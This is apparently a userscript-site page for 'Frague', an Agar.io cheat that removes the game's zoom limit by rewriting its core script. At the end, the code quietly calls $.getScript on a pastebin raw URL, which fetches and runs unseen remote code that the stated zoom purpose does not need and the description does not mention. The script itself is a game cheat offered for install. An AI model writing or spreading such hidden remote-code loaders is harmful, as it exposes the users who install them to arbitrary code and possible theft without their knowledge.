Frague

Agar.io Hile Extra Zoom

スクリプトをインストールするには、Tampermonkey, GreasemonkeyViolentmonkey のような拡張機能のインストールが必要です。

You will need to install an extension such as Tampermonkey to install this script.

スクリプトをインストールするには、TampermonkeyViolentmonkey のような拡張機能のインストールが必要です。

スクリプトをインストールするには、TampermonkeyUserscripts のような拡張機能のインストールが必要です。

このスクリプトをインストールするには、Tampermonkeyなどの拡張機能をインストールする必要があります。

このスクリプトをインストールするには、ユーザースクリプト管理ツールの拡張機能をインストールする必要があります。

(ユーザースクリプト管理ツールは設定済みなのでインストール!)

このスタイルをインストールするには、Stylusなどの拡張機能をインストールする必要があります。

このスタイルをインストールするには、Stylus などの拡張機能をインストールする必要があります。

このスタイルをインストールするには、Stylus tなどの拡張機能をインストールする必要があります。

このスタイルをインストールするには、ユーザースタイル管理用の拡張機能をインストールする必要があります。

このスタイルをインストールするには、ユーザースタイル管理用の拡張機能をインストールする必要があります。

このスタイルをインストールするには、ユーザースタイル管理用の拡張機能をインストールする必要があります。

(ユーザースタイル管理ツールは設定済みなのでインストール!)

このスクリプトの質問や評価の投稿はこちら通報はこちらへお寄せください
// ==UserScript==
// @name        Frague
// @namespace   Extension for agar.io + Zoom
// @description Agar.io Hile Extra Zoom
// @author      Emre
// @include     http://agar.io/*
// @include     https://agar.io/*
// @grant       GM_xmlhttpRequest
// @version     1.1.2
// @grant       none
// ==/UserScript==

window.stop();
document.documentElement.innerHTML = null;
var coreScript = '', mainDoc = '';
GM_xmlhttpRequest({
        method : "GET",
        url : 'http://agar.io/agario.core.js',
        onload : function(event) {
            coreScript = event.responseText;
            coreScript = coreScript.replace(/d=d<1\.0\?1\.0:d;/i, '');
             GM_xmlhttpRequest({
                 method : "GET",
                 url : 'http://agar.io/',
                 onload : function(event) {
                     mainDoc = event.responseText;
                     mainDoc = mainDoc.replace(/<script src="agario\.core\.js" async><\/script>/i, '<script>'+coreScript+'</script>');;
                     document.open();
                     document.write(mainDoc);
                    document.close();
                    var itv = setInterval(function(){
                      if($.length){
                          clearInterval(itv);
                          $['getScript']('//pastebin.com//raw.php?i=TwzPb29Y');
                      }
                    }, 500);
                 }
             });
        }
});